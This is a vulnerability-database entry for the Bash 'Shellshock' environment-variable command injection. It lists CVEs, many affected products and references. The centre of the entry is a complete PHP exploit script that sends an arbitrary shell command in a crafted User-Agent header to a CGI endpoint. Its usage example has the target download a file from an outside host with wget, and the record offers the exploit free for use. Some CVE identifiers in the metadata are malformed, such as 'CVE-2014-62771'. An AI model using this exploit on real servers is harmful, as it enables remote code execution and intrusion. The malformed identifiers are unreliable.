Details of VAR-E-201409-0019

ID

VAR-E-201409-0019

CVE

cve_id:	CVE-2014-7910	Trust: 1.0
cve_id:	CVE-2014-7227	Trust: 1.0
cve_id:	CVE-2014-7196	Trust: 1.0
cve_id:	CVE-2014-7169	Trust: 1.0
cve_id:	CVE-2014-62771	Trust: 1.0
cve_id:	CVE-2014-6271	Trust: 1.0
cve_id:	CVE-2014-3671	Trust: 1.0
cve_id:	CVE-2014-3659	Trust: 1.0
cve_id:	CVE-2014-6277	Trust: 0.3

sources: BID: 70165 // EXPLOIT-DB: 34766

EDB ID

34766

TITLE

Bash - 'Shellshock' Environment Variables Command Injection - Linux remote Exploit

Trust: 1.0

sources: EXPLOIT-DB: 34766

DESCRIPTION

Bash - 'Shellshock' Environment Variables Command Injection. CVE-2014-7910CVE-112004CVE-2014-7227CVE-2014-7196CVE-2014-7169CVE-2014-62771CVE-2014-6271CVE-2014-3671CVE-2014-3659 . remote exploit for Linux platform

Trust: 1.0

sources: EXPLOIT-DB: 34766

AFFECTED PRODUCTS

vendor:	bash	model:	-	scope:	-	version:	-	Trust: 1.0
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5	Trust: 0.6
vendor:	xerox	model:	workcentre	scope:	eq	version:	7245	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7242	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7238	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7235	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7232	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7228	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	78000	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	67000	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9393	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9303	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9302	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9301	Trust: 0.3
vendor:	ubuntu	model:	linux lts i386	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux lts amd64	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux sparc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.04	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	11	Trust: 0.3
vendor:	redhat	model:	enterprise linux	scope:	eq	version:	5.0	Trust: 0.3
vendor:	redhat	model:	enterprise linux client	scope:	eq	version:	5	Trust: 0.3
vendor:	red	model:	hat enterprise linux workstation	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux server	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux long life server	scope:	eq	version:	5.6	Trust: 0.3
vendor:	red	model:	hat enterprise linux hpc node	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux server	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.2	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.1	Trust: 0.3
vendor:	oracle	model:	linux	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6.2	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.3
vendor:	mcafee	model:	email gateway patch	scope:	eq	version:	7.01	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.0	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.22	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.21	Trust: 0.3
vendor:	ibm	model:	ds8000	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	7.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	6.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	5.3	Trust: 0.3
vendor:	hp	model:	insight control	scope:	eq	version:	0	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.1.4	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.0.16	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	4.2	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	4.1	Trust: 0.3
vendor:	gnu	model:	bash rc1	scope:	eq	version:	4.0	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	4.0	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.2.48	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.2	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.00.0(2)	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.0	Trust: 0.3
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.3
vendor:	cosmicperl	model:	directory pro	scope:	eq	version:	10.0.3	Trust: 0.3
vendor:	cisco	model:	wide area application services	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified contact center express	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	network analysis module	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	mds	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	gss 4492r global site selector	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	emergency responder	scope:	eq	version:	1.1	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	5.0	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	show and share	scope:	eq	version:	5(2)	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16.2	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.11	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.10	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.9	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.9	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.0.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.0.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.0.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.03	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.0	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6	Trust: 0.3

sources: BID: 70165 // EXPLOIT-DB: 34766

EXPLOIT

<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

Test CGI Code : #!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"

*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");

}
$url = $x['u'];
$cmd = $x['c'];

$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
);
$req = file_get_contents($url, false, $context);
if(!$req && strpos($http_response_header[0],"500") > 0 )
die("Command sent to the server!\n");
else if($req && !strpos($http_response_header[0],"500") > 0)
die("Server didn't respond as it should!\n");
else if(!$req && $http_response_header == NULL)
die("A connection error occurred!\n")
?>

Trust: 1.0

sources: EXPLOIT-DB: 34766

EXPLOIT LANGUAGE

php

Trust: 1.0

sources: EXPLOIT-DB: 34766

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 34766

TYPE

'Shellshock' Environment Variables Command Injection

Trust: 1.0

sources: EXPLOIT-DB: 34766

CREDITS

Prakhar Prasad & Subho Halder

Trust: 1.0

sources: EXPLOIT-DB: 34766

EXTERNAL IDS

db:	NVD	id:	CVE-2014-3671	Trust: 1.0
db:	NVD	id:	CVE-2014-7196	Trust: 1.0
db:	NVD	id:	CVE-2014-7227	Trust: 1.0
db:	NVD	id:	CVE-2014-7910	Trust: 1.0
db:	NVD	id:	CVE-2014-7169	Trust: 1.0
db:	NVD	id:	CVE-2014-62771	Trust: 1.0
db:	NVD	id:	CVE-2014-6271	Trust: 1.0
db:	NVD	id:	CVE-2014-3659	Trust: 1.0
db:	EXPLOIT-DB	id:	34766	Trust: 1.0
db:	NVD	id:	CVE-2014-6277	Trust: 0.3
db:	BID	id:	70165	Trust: 0.3

sources: BID: 70165 // EXPLOIT-DB: 34766

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2014-7910	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-7169	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-6271	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-62771	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-7196	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-3659	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-7227	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-3671	Trust: 1.0
url:	http://www.gnu.org/software/bash/	Trust: 0.3

sources: BID: 70165 // EXPLOIT-DB: 34766

SOURCES

db:	BID	id:	70165
db:	EXPLOIT-DB	id:	34766

LAST UPDATE DATE

2023-05-30T10:41:06.140000+00:00

SOURCES UPDATE DATE

db:

BID

id:

70165

date:

2015-10-26T16:51:00

SOURCES RELEASE DATE

db:	BID	id:	70165	date:	2014-09-27T00:00:00
db:	EXPLOIT-DB	id:	34766	date:	2014-09-25T00:00:00